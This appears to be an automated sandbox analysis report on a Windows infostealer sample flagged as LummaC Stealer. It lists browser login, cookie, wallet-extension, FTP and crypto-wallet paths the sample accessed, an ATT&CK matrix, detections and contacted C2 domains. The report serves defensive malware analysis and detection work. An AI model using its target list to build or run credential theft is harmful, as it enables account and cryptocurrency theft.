              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BWDRWEEARIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BWDRWEEARIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7636, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7636, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials223
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Infostealer.Tinba
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u0%URL Reputationsafe
              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              necklacedmny.store
              		188.114.96.3
              		truetrue
                		unknown
                presticitpo.store
                		unknown
                		unknowntrue
                  		unknown
                  thumbystriw.store
                  		unknown
                  		unknowntrue
                    		unknown
                    crisiwarny.store
                    		unknown
                    		unknowntrue
                      		unknown
                      fadehairucw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://necklacedmny.store/apitrue
                          		unknown
                          presticitpo.storetrue
                            		unknown
                            scriptyprefej.storetrue
                              		unknown
                              necklacedmny.storetrue
                                		unknown
                                fadehairucw.storetrue
                                  		unknown
                                  navygenerayk.storetrue
                                    		unknown
                                    founpiuer.storetrue
                                      		unknown
                                      thumbystriw.storetrue
                                        		unknown
                                        crisiwarny.storetrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://necklacedmny.store/hdfile.exe, 00000000.00000003.2340513943.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://necklacedmny.stofile.exe, 00000000.00000003.1897569815.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1897711414.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://necklacedmny.store/apis?file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
